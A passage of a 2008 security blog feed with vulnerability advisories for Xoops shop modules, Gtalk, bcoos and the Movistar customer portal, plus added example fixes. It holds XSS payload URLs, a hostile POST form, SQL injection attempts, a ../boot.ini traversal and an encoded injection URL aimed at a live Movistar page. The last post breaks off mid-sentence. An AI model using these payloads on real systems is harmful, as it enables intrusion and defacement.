class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....</div>Lostmon http://www.blogger.com/profile/12070694315455553235 noreply@blogger.com
tag:blogger.com,1999:blog-9011578.post-5103360420143464100 2008-08-09T07:30:00.001-07:00 2008-08-10T19:59:07.039-07:00
RMSOFT MiniShop module multiple variable XSS<br />##########################################<br />RMSOFT MiniShop module multiple variable XSS<br />Vendor url: http://redmexico.com.mx<br />Advisory: http://lostmon.blogspot.com/2008/08/rmsoft-minishop-module-multiple.html<br />Vendor notified: no. Exploit available: yes<br />##########################################<br /><br />RMSOFT MiniShop is an e-commerce PHP/MySQL script module for multiple CMS systems like Xoops, e-xoops, Bcoos and ImpressCMS, and probably all CMS based on Xoops code.<br /><br />RMSOFT MiniShop contains a flaw that allows a remote cross-site scripting attack. This flaw exists because the application does not validate multiple variables upon submission to the 'search.php' script in the RMSOFT MiniShop module. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to loss of integrity.<br /><br />#################<br />Versions<br />#################<br /><br />RMSOFT MiniShop 1.0<br /><br />It affects the following CMS systems if this module is installed:<br /><br />Xoops<br />e-xoops<br />ImpressCMS<br />Bcoos<br /><br />and others that use Xoops code and this module.<br /><br />###################<br />Solution<br />###################<br /><br />At this moment there is no solution...<br /><br />###################<br />Proof of Concept<br />###################<br /><br />#############<br />XSS<br />#############<br /><br />Vulnerable code for the 'key' and 'idc' variables, lines 35 and 36 of search.php:<br /><br />[code]<br />$key = isset($_GET['key']) ? $_GET['key'] : (isset($_POST['key']) ? $_POST['key'] : '');<br />$idc = isset($_GET['idc']) ? $_GET['idc'] : (isset($_POST['idc']) ? $_POST['idc'] : '');<br />[/code]<br /><br />To fix it, change it to:<br /><br />[code]<br />$key = isset($_GET['key']) ? htmlspecialchars($_GET['key']) : (isset($_POST['key']) ? htmlspecialchars($_POST['key']) : '');<br />$idc = isset($_GET['idc']) ? htmlspecialchars($_GET['idc']) : (isset($_POST['idc']) ? htmlspecialchars($_POST['idc']) : '');<br />[/code]<br /><br />Vulnerable code for the 'itemsxpag' variable, lines 56 to 67 of search.php:<br /><br />[code]<br />// Number of results per page<br />if (isset($_GET['itemsxpag'])){<br />    //setcookie('itemsxpag', $_GET['itemsxpag'], 86400);<br />    $_SESSION['itemsxpag'] = $_GET['itemsxpag'];<br />    $limit = $_GET['itemsxpag'];<br />} else {<br />    $limit = $_SESSION['itemsxpag'];<br />}<br />if ($limit <= 0){<br />    $limit = $xoopsModuleConfig['cols'] * 3;<br />    $_SESSION['itemsxpag'] = $limit;<br />}<br />[/code]<br /><br />Exploiting all three variables:<br /><br />http://localhost/impresscms/htdocs/modules/rmms/search.php?itemsxpag=4"><script>alert(1)</script>&Submit=Go%21&idc=0"><script>alert(2)</script>&key="><script>alert(3)</script><br /><br />This is a persistent script insertion in the 'itemsxpag' variable, because its value is inserted directly into the '$_SESSION' and '$limit' variables:<br /><br />http://localhost/impresscms/htdocs/modules/rmms/search.php?itemsxpag=12"><script>alert(1)</script>&Submit=Go%21&idc=&key=lalalalalala<br /><br />Navigate to the index, go back to the MiniShop module and try to search for something in the module's search box. When the results are shown, the script executed before is executed again.<br /><br />#####################<br />Possible SQL Injection<br />#####################<br /><br />When exploiting the script insertion example, if we look at the bottom of the page we see a SQL error:<br /><br />You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\">' at line 2<br /><br />We can try to inject some SQL code like:<br />http://localhost/impresscms/htdocs/modules/rmms/search.php?itemsxpag=-1/**/union/**/select/**/pass/**/form/**/x21101_users/**/LIMIT/**/1&idc=0&key=aaa<br /><br />http://localhost/impresscms/htdocs/modules/rmms/search.php?itemsxpag=28+UNION+SELECT+pass+FROM+x21101_users+LIMIT+1&Submit=Go%21&idc=&key=aaaaaa<br /><br />and we get this error: Incorrect usage of UNION and ORDER BY...<br /><br />We think of a classic SQL error, but I made several tests with union select, concat, etc., and do not have a working exploit... so this has an unknown impact and needs to be patched.<br /><br />############## €nd ###################<br /><br />Thanks to Estrella for being my light<br />Thanks to all the Lostmon Team!<br />Thanks to imydes from www.imydes.com<br />--<br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />Curiosity is what makes the mind move....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
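The itemsxpag flow rewritten defensively, as an added example that is not MiniShop's code: the value from the request was stored in $_SESSION and used as $limit unchanged, which is why the injection above is persistent and why the SQL error appears. page_size_unsafe() reproduces that pattern only for comparison; page_size() accepts an integer within assumed bounds before persisting anything, and limit_clause() builds the LIMIT fragment from integers through %d. $cols stands in for $xoopsModuleConfig['cols'], and the function names and bounds are hypothetical.

```php
<?php
// Added example, not RMSOFT MiniShop code: the itemsxpag handling from
// search.php rewritten so the request value is validated before it is
// stored in the session or used for LIMIT. $cols stands in for
// $xoopsModuleConfig['cols']; ITEMS_MIN and ITEMS_MAX are assumed bounds.

const ITEMS_MIN = 1;
const ITEMS_MAX = 100;

/**
 * The pattern the advisory describes: the raw GET value is written to the
 * session and used as $limit as-is, so text reaches the SQL string and,
 * because it now lives in the session, comes back on every later request.
 * Kept only so page_size() can be compared against it.
 */
function page_size_unsafe(array &$session, array $get, int $cols)
{
    if (isset($get['itemsxpag'])) {
        $session['itemsxpag'] = $get['itemsxpag'];
        $limit = $get['itemsxpag'];
    } else {
        $limit = $session['itemsxpag'] ?? 0;
    }
    if ($limit <= 0) {
        $limit = $cols * 3;
        $session['itemsxpag'] = $limit;
    }
    return $limit;
}

/**
 * Hardened version: the request value, or failing that the session value,
 * is accepted only if it is an integer within [ITEMS_MIN, ITEMS_MAX].
 * Everything else (text, negatives, a stale tampered session entry) falls
 * back to the module default, and only the validated integer is stored.
 */
function page_size(array &$session, array $get, int $cols): int
{
    $options   = ['options' => ['min_range' => ITEMS_MIN, 'max_range' => ITEMS_MAX]];
    $candidate = $get['itemsxpag'] ?? $session['itemsxpag'] ?? null;
    $limit     = filter_var($candidate, FILTER_VALIDATE_INT, $options);
    if ($limit === false) {
        $limit = min($cols * 3, ITEMS_MAX);
    }
    $session['itemsxpag'] = $limit;
    return $limit;
}

/**
 * Build the LIMIT clause from integers only. %d can never emit text, so
 * even a bug upstream cannot turn this fragment into a second statement.
 */
function limit_clause(int $start, int $limit): string
{
    return sprintf(' LIMIT %d, %d', $start, $limit);
}

/** Self-check with the advisory's payload shape (constructed input). */
function self_check(): array
{
    $unsafeSession = [];
    $safeSession   = [];
    $payload       = ['itemsxpag' => '12"><script>alert(1)</script>'];
    return [
        'unsafe_limit'   => page_size_unsafe($unsafeSession, $payload, 4),
        'unsafe_session' => $unsafeSession['itemsxpag'],
        'safe_limit'     => page_size($safeSession, $payload, 4),
        'safe_session'   => $safeSession['itemsxpag'],
        'safe_clause'    => limit_clause(0, page_size($safeSession, ['itemsxpag' => '25'], 4)),
    ];
}
```

Validating before the session write is what removes the persistence: a tampered value is never stored, so a later request that reads the session cannot be poisoned by an earlier one, and the LIMIT fragment only ever sees an integer.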
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....</div>Lostmon http://www.blogger.com/profile/12070694315455553235 noreply@blogger.com
tag:blogger.com,1999:blog-9011578.post-4956933585312791398 2008-08-06T10:47:00.002-07:00 2008-08-09T05:37:36.271-07:00
Kshop module search variable and field remote XSS<br />##########################################<br />Kshop module search variable and field remote XSS<br />Vendor url: http://www.kaotik.biz/<br />Advisory: http://lostmon.blogspot.com/2008/08/kshop-module-search-variable-and-field.html<br />Vendor notified: no. Exploit available: yes<br />##########################################<br /><br />Kshop is an e-commerce PHP/MySQL script module for multiple CMS systems like Xoops, e-xoops, Bcoos and ImpressCMS, and probably all CMS based on Xoops code.<br /><br />Kshop contains a flaw that allows a remote cross-site scripting attack. This flaw exists because the application does not validate the 'search' variable and the search form field included in this module upon submission to the 'kshop_search.php' script in the Kshop module. This could allow a user to create a specially crafted form that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to loss of integrity.<br /><br />#################<br />Versions<br />#################<br /><br />Kshop module 2.22<br /><br />I made a test with ImpressCMS, and in this CMS the kshop module has version 2.23 ????<br /><br />It is possible that prior versions are affected too.<br /><br />It affects the following CMS systems if this module is installed:<br /><br />Xoops<br />e-xoops<br />ImpressCMS<br />Bcoos<br /><br />and others that use Xoops code and this module.<br /><br />###################<br />Solution<br />###################<br /><br />At this moment there is no solution...<br /><br />But you can make a simple patch: open kshop_search.php inside the kshop module folder; around line 45 you have<br /><br />[code]<br />$xoopsTpl->assign('searchTerm',$_POST['search']);<br />[/code]<br /><br />You can use the strip_tags() PHP function, like:<br /><br />[code]<br />$xoopsTpl->assign('searchTerm',strip_tags($_POST['search']));<br />[/code]<br /><br />Now it is patched, because this removes all tags in the search variable.<br /><br />Or you can use the htmlentities() PHP function for a much cleaner patch, like:<br /><br />[code]<br />$xoopsTpl->assign('searchTerm',htmlentities($_POST['search']));<br />[/code]<br /><br />Or, much more restrictive:<br /><br />[code]<br />$xoopsTpl->assign('searchTerm',htmlspecialchars($_POST['search']));<br />[/code]<br /><br />Happy patching!<br /><br />###################<br />Proof of Concept<br />###################<br /><br />This issue cannot be exploited directly by URL, because the form field has a limit of 20 characters and we need a POST to exploit it; a URL is a GET and we need a POST.<br /><br />This is not a problem: we can make a form that POSTs, without any restriction on the form field, to exploit it.<br /><br />Put some JavaScript or HTML code in the form field.<br /><br /><p>Example: "><script>alert()</script><br /><br />It is necessary to put "> before the code.</p><br /><p><form action="http://[victim]/modules/kshop/kshop_search.php" method="POST"><br /><br /> <input type="text" name="search" value="Put your XSS Here !!!"><br /><br /> <input type="image" src="http://www.spymac.com/upload/2007/01/18/OQxsPeTzFN.gif"></form></p><br /><br />############## €nd ###################<br /><br />Thanks to Estrella for being my light<br />Thanks to all the Lostmon Team!<br />Thanks to imydes from www.imydes.com<br />--<br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />Curiosity is what makes the mind move....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
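The three candidate fixes compared on the post's own payload, as an added example that is not Kshop's code: compare_sanitizers() runs strip_tags(), htmlentities() and htmlspecialchars() over "><script>alert()</script>, and can_break_attribute() reports whether the result still carries a double quote or an angle bracket. That matters because the leading "> in the proof of concept indicates the term is echoed inside a quoted attribute: strip_tags() removes the script element but leaves that "> intact, while the two escaping functions turn the characters themselves into entities. For this ASCII input htmlentities() and htmlspecialchars() produce identical output; they differ only on non-ASCII characters, which htmlentities() also converts. Function names are hypothetical.

```php
<?php
// Added example, not Kshop code: the three functions the post proposes for
// kshop_search.php applied to the post's own payload, so the difference
// between removing tags and escaping characters is visible. The payload
// string is constructed from the proof of concept above.

const PAYLOAD = '"><script>alert()</script>';

/** Run each candidate over the same input and return the results side by side. */
function compare_sanitizers(string $input): array
{
    return [
        'raw'              => $input,
        'strip_tags'       => strip_tags($input),
        'htmlentities'     => htmlentities($input, ENT_QUOTES, 'UTF-8'),
        'htmlspecialchars' => htmlspecialchars($input, ENT_QUOTES, 'UTF-8'),
    ];
}

/**
 * Does the sanitized value still contain a double quote or an angle bracket?
 * Inside an attribute such as value="..." those characters are what lets
 * input leave the attribute, so a result fit for that context has neither.
 */
function can_break_attribute(string $sanitized): bool
{
    return strpbrk($sanitized, '"<>') !== false;
}

/** Render the search term the way a template would, into a value attribute. */
function render_search_box(string $sanitized): string
{
    return '<input type="text" name="search" value="' . $sanitized . '">';
}

/** Self-check: every candidate's output, its attribute safety and the rendered tag. */
function self_check(): array
{
    $out = [];
    foreach (compare_sanitizers(PAYLOAD) as $name => $value) {
        $out[$name] = [
            'value'      => $value,
            'breaks_out' => can_break_attribute($value),
            'html'       => render_search_box($value),
        ];
    }
    return $out;
}
```

The lesson the comparison makes concrete is that tag removal and escaping are different operations: the first changes the input, the second changes how the output context reads it, and only the second is tied to the place where the value ends up.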
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-45697892876173955162008-06-25T10:27:00.005-07:002008-07-12T06:49:23.674-07:00Gtalk 1.0.0.105 html injection and Stealing messages############################################<br />Gtalk 1.0.0.105 HTML injection and stealing messages<br />Vendor URL: http://www.google.com<br />Advisory: http://lostmon.blogspot.com/2008/06/<br />gtalk-100105-html-injection-and.html<br />Vendor notified: yes. Exploit available: yes<br />############################################<br /><blockquote><h4>This post was updated on 12-07-2008</h4><br /><br /><br />Apparently this flaw is now fixed for remote exploitation, but it<br />is still vulnerable in a local mode. For example:<br /><br />Before the patch, if an attacker sent the victim mailto: "><h1>Lostmon</h1><br />it was executed in the victim's Gtalk 1.0.0.105.<br /><br />After the patch, the server converts mailto:"><h1>Lostmon</h1> into<br />mailto: h1 Lostmon /h1 (very good).<br /><br />But if the victim sends the code to the attacker, it still<br />executes on the victim's machine. So the possible<br />exploitation of this issue by remote users is patched. Good work!<br /><br />It remains vulnerable to local exploitation. :|<br /></blockquote><br /><br />GTalk is an instant messaging service offered by Google.<br />It allows communication via traditional text or voice and is<br />also integrated with Gmail. According to information released<br />last year, Google Talk is used by more than 3 million users<br />worldwide.<br /><br /><br />GTalk contains a flaw that allows a remote<br />cross-site scripting or HTML injection attack. This flaw<br />exists because the application does not validate 'http'<br />and 'mailto' links upon submission to the conversation window.<br />This could allow a user to create a specially crafted URL<br />or mailto address that would execute arbitrary code<br />in a user's Gtalk within the trust relationship<br />between Gtalk and the server, leading to a loss of integrity.<br /><br />A remote user can steal messages from the target Gtalk user.<br /><br /><br />################<br />Versions affected<br />################<br /><br />This issue apparently does not affect Gtalk Labs edition<br />(tested without results).<br /><br />This issue apparently does not affect Gtalk web users<br />(tested without results in the web client from Mail.google.com).<br /><br />This issue apparently does not affect Gtalk Gadget users<br />(tested without results in the web client from http://talkgadget.google.com/talkgadget/popout?hl=es).<br /><br /><br />##################<br />Timeline<br />##################<br /><br />Discovered: 05-06-2008<br />Vendor notified: 07-06-2008<br />Vendor response: 07-06-2008<br />Vendor fix:<br />Public disclosure: 25-06-2007<br /><br />########################<br />Solution<br />########################<br /><br />No solution at this time; however, all users with a<br />vulnerable Gtalk client can talk without problems<br />with Google Talk Labs edition, with the web client in a<br />Gmail account, or with the Google Gtalk Gadget.<br /><br />################################<br />How to reproduce or how to test:<br />################################<br /><br />#################<br />HTML Injection<br />#################<br /><br />For this test we need two Gmail accounts (attacker<br />and victim) and Gtalk version 1.0.0.105.<br />In this test we only send an h1 HTML tag with some text, and<br />it is executed in the victim's Gtalk.<br /><br />Let's go!<br /><br />1- Open one account in the browser (go to mail.google.com<br /> and log in with the attacker's mail).<br /><br />2- Open the second account in Gtalk (open Gtalk and log<br /> in with the victim's mail).<br /><br />3- In the attacker's account, open a chat with the victim.<br /><br />4- Write this message to the victim: http://"><h1>Lostmon</h1><br /><br />When Gtalk tries to convert the text link into a clickable URL, the HTML<br />tag 'h1' is executed on the victim's machine, and from then on everything<br />the attacker writes has the 'h1' attribute on the victim's machine.<br /><br />To resolve this situation, the Gtalk user needs to write something<br />to the attacker.<br /><br />If the Gtalk user tries to send the same malformed link to a web user,<br />it is executed on his own machine but does not work on the web user's<br />machine: the web user only gets a clickable link, and the part of the URL with<br />the HTML is not clickable. So Gtalk users via web are not<br />vulnerable.<br /><br />If the Gtalk user (victim) tries to send it to the web user (attacker),<br />the HTML is executed in the Gtalk client, and now everything the victim<br />writes has the 'h1' attribute..... To resolve it, the attacker needs to send some<br />text to the victim, and then the conversation window is free of the 'h1' HTML tag.<br /><br />I made several tests with other tags, like script or img, but at<br />this moment I can't bypass the filter, or I can't look... deeper :P<br /><br />This issue occurs when Gtalk tries to convert text into a clickable URL;<br />this flaw affects the mailto function too!<br /><br />We can do the same test, but when sending the message, send this:<br />mailto:"><h1>Lostmon</h1>.<br /><br />Continuing the test with Gtalk Labs edition as the attacker and<br />Gtalk 1.0.0.105 as the victim, the attacker can send it to the<br />victim with the same result.<br /><br />We can try to insert another HTML tag like script, and apparently, if we<br />look at the source code of the Gtalk window, it is executed, but nothing<br />appears.... Send to the victim:<br />http://"><h1>Lostmon</h1> and<br />look at the source code of the Gtalk window.<br /><br /><br />If the attacker sends the victim:<br />http://&#34&#62&#60&#104&#49&#62&#76&#111&#115&#116&#109&#111&#110&#60&#47&#104&#49&#62<br /><br />Gtalk only converts this URL into its HTML value<br />http://"><h1>Lostmon</h1><br />but does not execute it...<br /><br />So Gtalk accepts HTML encoding!<br /><br />#######################################<br />Source in the victim's conversation window<br />########################################<br /><br /><DIV class="msg 1st"><SPAN style="FONT-WEIGHT: bold">Lostmon</SPAN>:<br /><br /> <A href='http://"></a href=""><h1>Lostmon</h1'>http://"&gt;</A><br /><br /> <H1>Lostmon</H1</a>&gt;</DIV><br /><br />###########################<br />Proof of message stealing<br />###########################<br /><br />Try it with the attacker sending from Gtalk Labs edition and the victim on Gtalk 1.0.0.105.<br /><br />If the victim has notifications enabled (for example, when other users talk to him<br />while he has Gtalk minimized), an attacker can send him:<br /><br />http://"><script>alert()</script><br /><br />or<br /><br />mailto:"><script>alert()</script><br /><br />and keep talking with the victim. The victim only has http://"> in his window,<br />but if the attacker keeps talking with him,<br />the victim can only see what the attacker says through the notifications,<br />for a few seconds, because when he looks at his window it only shows http://"><br /><br />This can be used for message stealing or other types of spoofing attacks.<br />This situation ends when the victim talks to the attacker.<br /><br /><br />If the victim sends http://"><script>alert()</script> to the attacker,<br />then the victim can't see any text he sends.<br />The victim needs the attacker to send him a message to resolve this<br />situation, and then the victim can see his messages again.<br /><br /><br />#################<br />Conclusion<br />#################<br /><br /><br />With the results of all these tests, we can conclude that the HTML<br />filter of Gtalk 1.0.0.105 does not work properly, and this can be a potential<br />vulnerability because an attacker can execute HTML code on the victim's machine<br />and steal messages on the victim's machine....<br /><br /><br />########################€nd##################<br /><br /><br />Thanks to estrella for being my light.<br />Thanks to FalconDeOro for his support.<br />Thanks to Imydes from www.imydes.com for testing with me.<br />Thanks to all the Lostmon Group Team for their continued support.<br />Thanks to the Google security team for their patience and fast response.<br /><br />-- <br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">
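The conversation-window source above shows the bug class: the auto-linker drops the matched http:// or mailto: token straight into the href attribute. The following Python is an added example (not Gtalk's code; the token matcher is an assumption) that puts a naive auto-linker beside a hardened one and checks which elements a browser would end up seeing.

```python
import html
import re

# Tokens the client turns into links. The real Gtalk matcher is not known;
# "scheme up to the next whitespace" is an assumed model that reproduces the
# behaviour the advisory describes.
LINK_RE = re.compile(r'(?:https?://|mailto:)\S+')

# Characters that can never appear unencoded inside a URL
UNSAFE_URL_CHARS = set('<>"\'')

# Constructed messages: the advisory's two payloads and one harmless link
PAYLOAD_HTTP = 'http://"><h1>Lostmon</h1>'
PAYLOAD_MAILTO = 'mailto:"><h1>Lostmon</h1>'
PLAIN = 'see http://lostmon.blogspot.com/ now'

TAG_RE = re.compile(r'</?([A-Za-z][A-Za-z0-9]*)')


def linkify_vulnerable(text: str) -> str:
    """Naive auto-linker: the matched token is placed in the href attribute
    and the element body unchanged, so a quote in the token terminates the
    attribute and the rest of the token becomes live markup."""
    return LINK_RE.sub(lambda m: f'<a href="{m.group(0)}">{m.group(0)}</a>', text)


def linkify_safe(text: str) -> str:
    """Hardened auto-linker: every fragment is HTML-escaped before it is
    placed in an attribute or in the body, and a token carrying characters
    that cannot occur unencoded in a URL is shown as escaped text, not linked."""
    out, pos = [], 0
    for m in LINK_RE.finditer(text):
        out.append(html.escape(text[pos:m.start()]))
        url = m.group(0)
        if UNSAFE_URL_CHARS & set(url):
            out.append(html.escape(url))
        else:
            out.append(f'<a href="{html.escape(url, quote=True)}">{html.escape(url)}</a>')
        pos = m.end()
    out.append(html.escape(text[pos:]))
    return ''.join(out)


def tags_in(markup: str) -> set:
    """Names of the elements a browser would see in the produced markup."""
    return {m.group(1).lower() for m in TAG_RE.finditer(markup)}
```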
</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-67690441387633036622008-05-18T08:31:00.003-07:002008-07-12T06:42:06.644-07:00Bcoos highlight.php traversal file access####################################<br />Bcoos =< 1.0.13 highlight.php traversal file access<br />Vendor URL: http://www.bcoos.net<br />Advisory: http://lostmon.blogspot.com/2008/05/<br />bcoos-highlightphp-traversal-file.html<br />Vendor notified: yes. Exploit available: yes<br />####################################<br /><br /><br />bcoos is a content-community management system written in PHP-MySQL.<br /><br />A directory traversal vulnerability in bcoos 1.0.13 and earlier<br />allows remote attackers to read arbitrary files via a ../<br />(dot dot) in the file parameter, or directly if the attacker knows the full path.<br /><br />Only files with an extension can be read; if the file has no extension,<br />bcoos redirects to the index.<br /><br />##############<br />Versions<br />##############<br /><br />bcoos 1.0.13<br />bcoos 1.0.12<br />bcoos 1.0.11<br />bcoos 1.0.10<br />bcoos 1.0.9<br /><br />##############<br />Solution<br />##############<br /><br />No solution was available at this time!<br /><br />Vendor bug tracker: http://www.bcoos.net/modules/<br />devtracker/view_issue.php?issue_id=2467<br /><br />##############<br />Timeline<br />##############<br /><br />Discovered: 02-03-2008<br />Vendor notified: 18-05-2008<br />Vendor response:<br />Vendor fix:<br />Disclosure: 18-05-2008<br /><br />################<br />Proof of Concept<br />################<br /><br />http://localhost/bcoos/class/debug/<br />highlight.php?file=C:\boot.ini<br /><br />http://localhost/bcoos/class/debug/<br />highlight.php?file=../../../../../boot.ini<br /><br />To exploit this issue the attacker needs webmaster privileges.<br />But if a system has multiple webmasters, all of them can read files<br />outside the web server root directory.<br /><br />The file we want to access needs an extension; if the file has no<br />extension we can't read it, and bcoos redirects to the index.<br /><br />################€nd##################<br /><br />--<br />Thanks to estrella for being my light.<br />Thanks to FalconDeOro for his support.<br />Thanks to Imydes from http://www.imydes.com<br /><br />-- <br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">
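The two PoC values above (an absolute Windows path and a ../ chain) are exactly what a file parameter handler has to refuse. As an added example (not bcoos code; the root directory and helper names are assumptions), the following Python resolves a requested file against a fixed root, rejects anything that escapes it, and keeps the extension requirement the advisory describes.

```python
import os
import tempfile


class TraversalRejected(ValueError):
    pass


def resolve_highlight_target(root: str, requested: str) -> str:
    """Resolve a user-supplied 'file' value against a fixed root and refuse
    anything that escapes it. Covers the checks the advisory says are missing
    (absolute Windows path, ../ sequences) and the one it says exists (an
    extension is required). Assumed replacement logic, not bcoos's own."""
    if not requested or '\x00' in requested:
        raise TraversalRejected('empty or NUL-containing path')
    # bcoos serves nothing without an extension (it redirects to the index)
    if not os.path.splitext(requested)[1]:
        raise TraversalRejected('no extension')
    # Absolute paths (C:\boot.ini, /etc/passwd) are never valid relative names;
    # the drive-letter test catches Windows paths even when running on POSIX
    if os.path.isabs(requested) or requested[1:3] in (':\\', ':/'):
        raise TraversalRejected('absolute path')
    # Normalise backslashes so a Windows-style ..\ is caught on POSIX too
    candidate = os.path.realpath(os.path.join(root, requested.replace('\\', '/')))
    real_root = os.path.realpath(root)
    if os.path.commonpath([real_root, candidate]) != real_root:
        raise TraversalRejected('escapes root')
    return candidate


def demo_results() -> dict:
    """Run the advisory's two PoC values plus a legitimate name and a name
    without extension against a temporary root; returns the verdict per value."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, 'class', 'debug'))
        with open(os.path.join(root, 'class', 'debug', 'highlight.php'), 'w') as f:
            f.write('<?php ?>')  # constructed placeholder file
        results = {}
        for value in ('C:\\boot.ini', '../../../../../boot.ini',
                      'class/debug/highlight.php', 'class/debug/noext'):
            try:
                resolve_highlight_target(root, value)
                results[value] = 'allowed'
            except TraversalRejected as e:
                results[value] = f'rejected: {e}'
        return results
```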
</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-14018913190199586882008-05-17T14:12:00.002-07:002008-07-12T06:42:06.644-07:00Canal cliente de Movistar Vulnerable a XSS######################################<br />Movistar customer portal (Canal cliente) vulnerable to Cross-Site Scripting attacks<br />######################################<br /><br />The Movistar page https://www.canalcliente.movistar.es<br />is affected by a vulnerability called Cross-site<br />scripting (XSS), through which an attacker can induce<br />a victim user to visit that page through a specially<br />crafted URL and execute HTML or JavaScript code in<br />the victim user's browser, in the security context<br />of the trust relationship between the browser and the server,<br />being able to obtain the information the user has just sent<br />or to perform actions on his behalf.<br /><br />There is a proof of concept and a sample image.<br />Movistar was notified by e-mail and through the contact system<br />on the same website, but no response has been obtained.<br /><br />#################<br />Exploit<br />#################<br /><blockquote>https://www.canalcliente.movistar.es/fwk/cda/controller/CCLI_CW_publico/0,2214,259_1854_200108516_0_0,00.html?codError=SGAP036&mensaje=%3C%68%31%3E%53%65%20%62%75%73%63%61%20%48%34%78%30%72%3C%73%74%72%6F%6E%67%3E%2C%20%63%6F%6D%6F%20%4C%6F%73%74%6D%6F%6E%20%70%6F%72%20%65%6A%65%6D%70%6C%6F%3A%3C%70%3E%0D%0A%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%4C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%68%74%74%70%3A%2F%2F%4C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%3C%2F%61%3E%3C%2F%70%3E%3C%2F%68%31%3E%0D%0A%20%45%73%20%70%65%6C%69%67%72%6F%73%6F%20%79%20%76%61%20%61%72%6D%61%64%6F%3C%62%72%3E%20%4C%6C%65%76%61%20%75%6E%20%70%6F%72%74%61%74%69%6C%20%79%20%75%6E%20%70%61%6C%6D%20%65%6E%20%6C%61%73%20%6D%61%6E%6F%73%3C%62%72%3E%20%73%69%20%6C%65%20%76%65%6E%20%3B%20%6E%6F%20%6C%65%20%70%72%6F%70%6F%72%63%69%6F%6E%65%6E%20%63%6F%6E%65%78%69%6F%6E%20%61%20%69%6E%74%65%72%6E%65%74%2E%3C%2F%70%3E%3C%2F%73%74%72%6F%6E%67%3E%3C%70%3E%3C%2F%70%3E%3C%69%6D%67%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%74%74%76%6E%2E%63%6F%6D%2E%76%6E%2F%55%70%6C%6F%61%64%65%64%2F%61%64%6D%69%6E%69%73%74%72%61%74%6F%72%2F%68%61%63%6B%65%72%2E%6A%70%67%3E%3C%68%31%3E%42%79%20%4C%6F%73%74%6D%6F%6E%3C%2F%68%31%3E</blockquote><br /><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/movistar.GIF" height="250" width="400"></center><br />--<br />Thanks to estrella for being my light.<br />Thanks to FalconDeOro for his support.<br />Thanks to Imydes from http://www.imydes.com<br /><br />-- <br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />Curiosity is what moves the mind....<div class="blogger-post-footer">
</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-50502468160286579362008-04-06T04:41:00.008-07:002008-04-06T10:41:05.649-07:00Multiple Browsers DoS by evil javascript code<center><p>Multiple Browsers DoS by <a href="http://lostmon.blogspot.com/" target="_blank">Lostmon</a></p></center><br />Tested on Windows with IE7, IE8, Mozilla Firefox, Avant Browser,<br />Flock Browser and Safari; Opera apparently is<br />not vulnerable.<br /><br />In all cases the browser becomes slow and unresponsive and<br />the application hangs, resulting in a recoverable DoS issue.<br />The code plays with document.href and window.open.<br /><br />I decided to obfuscate the code to make it harder for others to read.<br /><br /><strong>Internet Explorer:</strong><br />Aplicación que no responde: iexplore.exe, versión 8.0.6001.17184,<br />módulo que no responde hungapp, versión 0.0.0.0, dirección<br />que no responde 0x00000000.<br /><br />In IE 8 I was surprised, because if we open the exploit locally<br />from the desktop, for example, and allow the ActiveX warning<br />and allow popups, iexplore opens a window with the contents of c:\<br /><br />I was surprised because the relative URL (location.href) of the<br />exploit when opened from the desktop is C:\documents and<br />settings\YOUR_USER\desktop\browser_die.html<br /><br />So why does Explorer open a window with c:\ ... this is an incorrect<br />location.href location....<br /><br /><strong>Flock Browser:</strong><br /><br />Aplicación que no responde: flock.exe, versión 1.1.1.0,<br />módulo que no responde hungapp, versión 0.0.0.0, dirección<br />que no responde 0x00000000.<br /><br /><strong>Mozilla Firefox:</strong><br />Aplicación que no responde: firefox.exe, versión 1.8.20080.31114,<br />módulo que no responde hungapp, versión 0.0.0.0, dirección que<br />no responde 0x00000000.<br /><br /><br /><strong>Avant Browser:</strong><br />Aplicación que no responde: avant.exe, versión 11.5.0.0,<br />módulo que no responde hungapp, versión 0.0.0.0,<br />dirección que no responde 0x00000000.<br /><br />In Avant Browser, if the popup blocker is on, the browser<br />becomes unresponsive in a few seconds; if it is not on,<br />the browser detects that this is a slow script, but hangs too.<br /><br /><strong>Safari for Windows:</strong><br /><br />In Safari for Windows, if we have a window open with Google,<br />for example, open the exploit in a new Safari window<br />and click the button, Safari opens a 